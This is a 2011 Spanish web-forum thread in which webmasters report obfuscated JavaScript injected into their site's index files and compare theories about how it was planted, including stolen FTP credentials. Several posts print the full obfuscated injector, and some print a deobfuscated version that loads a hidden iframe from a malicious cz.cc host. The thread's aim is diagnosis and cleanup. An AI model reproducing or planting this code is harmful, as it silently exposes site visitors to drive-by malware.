Foros del Web » Soporte técnico » Virus, troyanos y spyware »

Pagina web infectada con dianagar.cz.cc ?!

Estas en el tema de Pagina web infectada con dianagar.cz.cc ?! en el foro de Virus, troyanos y spyware en Foros del Web. Ayer hice unos cambios en la web, en la que vengo trabajando casi dia a dia. Y hoy me encuentro con que Chrome lanza un ...

  #1 (permalink)  
Antiguo 27/01/2011, 11:07
Avatar de mayid
Colaborador
 
Fecha de Ingreso: marzo-2009
Ubicación: BsAs
Mensajes: 4.014
Antigüedad: 15 años, 8 meses
Puntos: 101
Pagina web infectada con dianagar.cz.cc ?!

Ayer hice unos cambios en la web, en la que vengo trabajando casi dia a dia. Y hoy me encuentro con que Chrome lanza un mensaje de advertencia "este sitio puede dañar su equipo".

Por otro lado, nuestro diseñador encontró un error de sintaxis en un archivo index, un simple < que faltaba. Cuando abro el archivo para ver de que se trata encuentro este codigo inyectado. Pero como pudo llegar ahí?!

Código HTML:
<html><body><script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#c0','background:url(data:,eval)');var hm=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var iix=r[i].cssRules||r[i].rules;for(var xoyy=0;xoyy<iix.length;xoyy++){var kba=iix.item?iix.item(xoyy):iix[xoyy];if(!kba.selectorText.match(/#c(\d+)/))continue;hm=kba.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};}catch(e){};}

xo=new Date(2010,11,3,2,21,4);t=xo.getSeconds();var huur=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,400/t,420/t,388/t,440/t,388/t,412/t,388/t,456/t,184/t,396/t,488/t,184/t,396/t,396/t,188/t,420/t,440/t,184/t,448/t,416/t,448/t,252/t,388/t,244/t,324/t,324/t,428/t,280/t,264/t,412/t,192/t,268/t,264/t,260/t,396/t,312/t,264/t,412/t,292/t,308/t,276/t,428/t,396/t,296/t,264/t,324/t,356/t,312/t,260/t,412/t,324/t,268/t,264/t,324/t,292/t,308/t,264/t,476/t,244/t,244/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,400/t,420/t,388/t,440/t,388/t,412/t,388/t,456/t,184/t,396/t,488/t,184/t,396/t,396/t,188/t,420/t,440/t,184/t,448/t,416/t,448/t,252/t,388/t,244/t,324/t,324/t,428/t,280/t,264/t,412/t,192/t,268/t,264/t,260/t,396/t,312/t,264/t,412/t,292/t,308/t,276/t,428/t,396/t,296/t,264/t,324/t,356/t,312/t,260/t,412/t,324/t,268/t,264/t,324/t,292/t,308/t,264/t,476/t,244/t,244/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var zsas="";elze=function(){return{e:eval}}().e;qp=elze(hm);var pr='';var gsr="fro"+xo.getSeconds()+"arCode";gsr=gsr.replace(4,"mCh");ofz=String[gsr];for(var i=0;i<huur.length;i++){crvr=qp(huur[i]);ofz.call(crvr);pr+=ofz(crvr);}

qp(pr);</script></body></html> 
  #2 (permalink)  
Antiguo 27/01/2011, 12:55
Avatar de mayid
Colaborador
 
Fecha de Ingreso: marzo-2009
Ubicación: BsAs
Mensajes: 4.014
Antigüedad: 15 años, 8 meses
Puntos: 101
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Al rato de eliminar eses codigo, veo que aparece en todos los archivos index que tenía en mi sitio. La solucion fue eliminarlo, cambiar la clave del FTP; y de ahora en más empezar a usar las Herramientas de Google para Webmasters, que se ocupan de esto del pishing y malware.
  #3 (permalink)  
Antiguo 27/01/2011, 15:50
 
Fecha de Ingreso: enero-2011
Mensajes: 4
Antigüedad: 13 años, 10 meses
Puntos: 0
Exclamación Respuesta: Pagina web infectada con dianagar.cz.cc ?!

A mi también me ha pasado... Es seguro que han accedido por FTP? ... Que servidor utilizas? Yo ando un poco perdido... Por de pronto he desofuscado el codigo inyectado.... lo pego a continuación.

Es un intento de cargar un iframe oculto con un enlace a una web maliciosa
if( document.getElementsByTagName('body')[0] )
{
iframer();
}
else
{
var bdy = document.createElement( "body" );
try
{
document.appendChild(bdy);
}
catch (e)
{
document.body = bdy;
}

if( document.getElementsByTagName('body')[0] )
{
iframer();
}
else
{
document.write("<iframe src='http://dianagar.cz.cc/in.php?a=QQkFBg0CBAcNBgIMEkcJBQYNAgQCBQIMBw==' width='10' height='10' style='visibility:hidden;position:absolute;left:0; top:0;'></iframe>");
}
}

function iframer()
{
var f = document.createElement('iframe');
f.setAttribute('src','http://dianagar.cz.cc/in.php?a=QQkFBg0CBAcNBgIMEkcJBQYNAgQCBQIMBw==');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
  #4 (permalink)  
Antiguo 27/01/2011, 16:09
 
Fecha de Ingreso: enero-2011
Mensajes: 4
Antigüedad: 13 años, 10 meses
Puntos: 0
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Bueno yo tengo

Joomla 1.5.x (no recuerdo cual)
y los servicios basicos del proveedor: ftp, etc

Es que no me queda claro la entrada, si es por ftp o por tener joomla desactualizado porque también hay gente que no tiene joomla y ha sufrido el ataque.


Cita:
Iniciado por piku Ver Mensaje
A mi también me ha pasado... Es seguro que han accedido por FTP? ... Que servidor utilizas? Yo ando un poco perdido... Por de pronto he desofuscado el codigo inyectado.... lo pego a continuación.

Es un intento de cargar un iframe oculto con un enlace a una web maliciosa
if( document.getElementsByTagName('body')[0] )
{
iframer();
}
else
{
var bdy = document.createElement( "body" );
try
{
document.appendChild(bdy);
}
catch (e)
{
document.body = bdy;
}

if( document.getElementsByTagName('body')[0] )
{
iframer();
}
else
{
document.write("<iframe src='http://dianagar.cz.cc/in.php?a=QQkFBg0CBAcNBgIMEkcJBQYNAgQCBQIMBw==' width='10' height='10' style='visibility:hidden;position:absolute;left:0; top:0;'></iframe>");
}
}

function iframer()
{
var f = document.createElement('iframe');
f.setAttribute('src','http://dianagar.cz.cc/in.php?a=QQkFBg0CBAcNBgIMEkcJBQYNAgQCBQIMBw==');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
  #5 (permalink)  
Antiguo 27/01/2011, 16:45
Avatar de ArturoGallegos
Moderador
 
Fecha de Ingreso: febrero-2008
Ubicación: Morelia, México
Mensajes: 6.774
Antigüedad: 16 años, 9 meses
Puntos: 1146
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

si tienen duda como inyectaron el código... pregunten a su proveedor de hosting, o revisen su panel de control en la secciona de logs.

personalmente también me ha pasado eso, y lo reviso en el panel de control (uso hosting dedicado) y en la sección de logs puedo consultar que cuenta de ftp se conecto, la hora y archivos modificados (editados, movidos, eliminados)

si en su panel no encuentran nada que les ayude siempre el proveedor podrá proporcionar esos datos
  #6 (permalink)  
Antiguo 27/01/2011, 16:48
 
Fecha de Ingreso: enero-2011
Mensajes: 1
Antigüedad: 13 años, 10 meses
Puntos: 0
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Chicos, me a pasado lo mismo hoy en mi web creada con wordpress, que demonios ha pasado? Estoi algo asustao...

http://energysoundfm.com/
  #7 (permalink)  
Antiguo 27/01/2011, 17:10
Avatar de mayid
Colaborador
 
Fecha de Ingreso: marzo-2009
Ubicación: BsAs
Mensajes: 4.014
Antigüedad: 15 años, 8 meses
Puntos: 101
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Chicos, sin panico. Registren su sitio en Google Webmaster Tools. Con eso van a tener una gran ayuda para detectar este tipo de malware/pishing. Y usando algunas de las herramientas pueden encontrar los archivos infectados.

En mi caso, me di cuenta de que el bichito solo atacaba archivos index.php, así que lo eliminé de los 7 index que tengo y todo fue bien.

En el mundo hacker no es dificil obtener claves. Y a veces teniendo una se consiguen un monton mas. Pero voy a ver el log del hosting a ver que me encuentro...
  #8 (permalink)  
Antiguo 27/01/2011, 19:07
 
Fecha de Ingreso: enero-2011
Mensajes: 4
Antigüedad: 13 años, 10 meses
Puntos: 0
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

¿Se sabe algo del origen?
  #9 (permalink)  
Antiguo 28/01/2011, 14:39
Avatar de juanolo  
Fecha de Ingreso: abril-2008
Mensajes: 251
Antigüedad: 16 años, 8 meses
Puntos: 5
Exclamación Respuesta: Pagina web infectada con dianagar.cz.cc ?!

A mi tambien me ha ocurrido en tres paginas webs que tengo a mi cargo en diferentes servidores (arsys, 1&1) y diferentes sistemas (wordpress y paginas hechas a mano).

El codigo infecta toda pagina que se llame index, header, footer.

El codigo es el siguiente...

<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isI E)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName(" head")[0].appendChild(style_node);if(isIE&&document.styleSh eets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last _style_node.addRule(selector,declaration);}};creat eCSS('#c0','background:url(data:,eval)');var hm=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var iix=r[i].cssRules||r[i].rules;for(var xoyy=0;xoyy<iix.length;xoyy++){var kba=iix.item?iix.item(xoyy):iix[xoyy];if(!kba.selectorText.match(/#c(\d+)/))continue;hm=kba.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};}catch(e){};}

xo=new Date(2010,11,3,2,21,4);t=xo.getSeconds();var huur=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,400/t,420/t,388/t,440/t,388/t,412/t,388/t,456/t,184/t,396/t,488/t,184/t,396/t,396/t,188/t,420/t,440/t,184/t,448/t,416/t,448/t,252/t,388/t,244/t,324/t,324/t,428/t,280/t,264/t,412/t,192/t,268/t,264/t,260/t,396/t,312/t,264/t,412/t,292/t,308/t,276/t,428/t,396/t,296/t,264/t,324/t,356/t,312/t,260/t,412/t,324/t,268/t,264/t,324/t,292/t,308/t,264/t,476/t,244/t,244/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,400/t,420/t,388/t,440/t,388/t,412/t,388/t,456/t,184/t,396/t,488/t,184/t,396/t,396/t,188/t,420/t,440/t,184/t,448/t,416/t,448/t,252/t,388/t,244/t,324/t,324/t,428/t,280/t,264/t,412/t,192/t,268/t,264/t,260/t,396/t,312/t,264/t,412/t,292/t,308/t,276/t,428/t,396/t,296/t,264/t,324/t,356/t,312/t,260/t,412/t,324/t,268/t,264/t,324/t,292/t,308/t,264/t,476/t,244/t,244/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var zsas="";elze=function(){return{e:eval}}().e;qp=elz e(hm);var pr='';var gsr="fro"+xo.getSeconds()+"arCode";gsr=gsr.replace (4,"mCh");ofz=String[gsr];for(var i=0;i<huur.length;i++){crvr=qp(huur[i]);ofz.call(crvr);pr+=ofz(crvr);}

qp(pr);</script>

Yo no entiendo como es posible que lo hayan hecho.
Incluso e estado cambiando una primera web pero a la hora o asi se a vuelto a reescribir el codigo. He tenido que cambiar el password del servidor FTP y ya no a vuelto a ocurrir. En los otros servidores no puedo cambiar la password porke no tengo acceso al panel de control... veremos si mañana no se a vuelto a reproducir el codigo malicioso.

¿COMO ES POSIBLE?

Si alguien a modificado el codigo es porque a tenido acceso al servidor FTP no?
A mi solo se me ocurren dos posibilidades...
- Que a los que nos haya pasado tengamos algun virus o keylogger y nos han cogido las contraseñas.
- Que servidores como 1&1 o Arsys esten infectados de algo... cosa que me parece extraña.

¿Que a podido suceder? ¿Teneis alguna idea?
  #10 (permalink)  
Antiguo 29/01/2011, 07:09
Avatar de juanolo  
Fecha de Ingreso: abril-2008
Mensajes: 251
Antigüedad: 16 años, 8 meses
Puntos: 5
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Es muy importante cambiar la contraseña del servidor, por que si no, si lo solucionas, a las pocas horas lo vuelve a infectar.

Sospecho que es por alguna vunerabilidad de los blogs de Wordpress y no se si Joomla (joomla yo no tengo)

Pero de 4 webs que tengo a mi cargo, las que tenian un blog Wordpress han sido infectadas y la que no tenia Blog (pero tambien estaba programada la web en php) no ha sido infectada.

Sospecho que es una vulnerabilidad de Wordpress. ¿Y vosotros?
  #11 (permalink)  
Antiguo 29/01/2011, 07:37
Avatar de mayid
Colaborador
 
Fecha de Ingreso: marzo-2009
Ubicación: BsAs
Mensajes: 4.014
Antigüedad: 15 años, 8 meses
Puntos: 101
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

juanolo: el problema no es de arsys, 1&1, ni tampoco de Wordpress o Joomla. Yo no tengo nada de eso y sin embargo pasó. El problema es que de alguna manera nos hicieron pishing (robo de contraseñas). Y no creo posible saber cómo lo hicieron ni cuando (me refiero a cuando consiguieron las passwords).

Por ahora con cambiar la clave del FTP todo va bien. No hubo reinfeccion. Por otro lado, me acabo de enterar de que a SourceForce lo atacaron (pero no con esto sino con intento de robo de contraseñas en base de datos): http://sourceforge.net/blog/sourceforge-net-attack/
Es decir, le puede pasar a todo el mundo!
  #12 (permalink)  
Antiguo 29/01/2011, 08:39
Avatar de juanolo  
Fecha de Ingreso: abril-2008
Mensajes: 251
Antigüedad: 16 años, 8 meses
Puntos: 5
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Si, le puede pasar a todo el mundo, pero no es algo que tranquilice xD.

Yo he revisado con varios antivirus mi sistema y no he encontrado ningun virus ni nada y esto es algo que yo y supongo que todos tenemos muy controlado, no solemos ser usuarios "comunes" que ven una "foto con extension .exe" y lo ejecutan cuando evidentemente se ve que es un virus.

¿Cual seria tu teoria mas cercana?
¿Que el problema es de tipo local en nuestros propios ordenadores y el fallo es nuestro?
¿o que podria ser alguna vulnerabilidad de nuestras paginas webs y/o configuracion del servidor, privilegios, etc?
  #13 (permalink)  
Antiguo 29/01/2011, 09:01
Avatar de mayid
Colaborador
 
Fecha de Ingreso: marzo-2009
Ubicación: BsAs
Mensajes: 4.014
Antigüedad: 15 años, 8 meses
Puntos: 101
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Creo que la vulnerabilidad esta en nuestra pc, cuando nos conectamos. No creo que los host la tengan. Pero me gustaría que los de piensasolutions contestasen nuestros avisos y se sinceracen en caso de que hayan tenido otros sitios infectados. Si no, me enteraré por los foros (pero ya veo que hay otros hosting de punta con problemas similares).

En fin, creo que el pishing se hace en nuestras conecciones. Pero pienso que no hay que temer, que esto es muy esporádico (es la primera vez que me pasa en años) y que si bien deja un gusto amargo uno sabe que son ataques "al azar" y que tener infectado un sitio no implica que todos nuestros sitios se vayan a infectar.

Saludos!
  #14 (permalink)  
Antiguo 29/01/2011, 09:03
Avatar de mayid
Colaborador
 
Fecha de Ingreso: marzo-2009
Ubicación: BsAs
Mensajes: 4.014
Antigüedad: 15 años, 8 meses
Puntos: 101
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Creo que la vulnerabilidad esta en nuestra pc, cuando nos conectamos. No creo que los host la tengan. Pero me gustaría que los de piensasolutions contestasen nuestros avisos y se sinceracen en caso de que hayan tenido otros sitios infectados. Si no, me enteraré por los foros (pero ya veo que hay otros hosting de punta con problemas similares).

En fin, creo que el pishing se hace en nuestras conecciones. Pero pienso que no hay que temer, que esto es muy esporádico (es la primera vez que me pasa en años) y que si bien deja un gusto amargo uno sabe que son ataques "al azar" y que tener infectado un sitio no implica que todos nuestros sitios se vayan a infectar.

Ahora mismo estoy corriendo el SuperAntiSpyware a ver que encuentro. Otras veces ya he encontrado malware/pishing.

Saludos!
  #15 (permalink)  
Antiguo 29/01/2011, 11:24
 
Fecha de Ingreso: enero-2007
Mensajes: 31
Antigüedad: 17 años, 11 meses
Puntos: 0
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Buenas Tardes, Estoy con el mismo problema, a mi se me ha insertado el código en los index.php y header.php. He estado quitandolos pero quiero asegurarme de que no hay mas ficheros infectados; donde están esos logs de los que habláis; tengo plesk 9.5 pero los logs que puedo ver son de peticiones web y no de accesos ftp y archivos modificados.

Una ayudita??
  #16 (permalink)  
Antiguo 29/01/2011, 11:28
 
Fecha de Ingreso: diciembre-2007
Mensajes: 2
Antigüedad: 17 años
Puntos: 0
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

hola gente, yo estoy en strato y me a pasado lo mismo que relatais por este foro. ese codigo en el index ademas se me a creado una carpeta en el hosting "psd" que ya he borrado. el caso que a mi, strato me ha bloqueado el dominio y he recibido un email de google donde dicen que van a estudiarlo, ya veremos k dicen.
tbn han entrado la noche pasada en mi hotmail, y han leido y desechado algunos de mis emails a la papelera ,supongo que buscando información, asi que yo pienso más en algún tipo de keyloguer...
  #17 (permalink)  
Antiguo 29/01/2011, 11:47
Avatar de mayid
Colaborador
 
Fecha de Ingreso: marzo-2009
Ubicación: BsAs
Mensajes: 4.014
Antigüedad: 15 años, 8 meses
Puntos: 101
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Seguramente hay alguien humano con el keyloguer o con la tecnica que sea. Pero el script es automatico, claro esta, y por eso solo afecta cierto tipo de archivos. En mi web había unos 30 archivos index y solo un script puede encontrarlos. Un bajon actualizar todo!

Voy a denunciar el sitio en cz.cc

Última edición por mayid; 29/01/2011 a las 11:52
  #18 (permalink)  
Antiguo 29/01/2011, 15:15
Avatar de juanolo  
Fecha de Ingreso: abril-2008
Mensajes: 251
Antigüedad: 16 años, 8 meses
Puntos: 5
Exclamación Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Cita:
Iniciado por moski31 Ver Mensaje
hola gente, yo estoy en strato y me a pasado lo mismo que relatais por este foro. ese codigo en el index ademas se me a creado una carpeta en el hosting "psd" que ya he borrado. el caso que a mi, strato me ha bloqueado el dominio y he recibido un email de google donde dicen que van a estudiarlo, ya veremos k dicen.
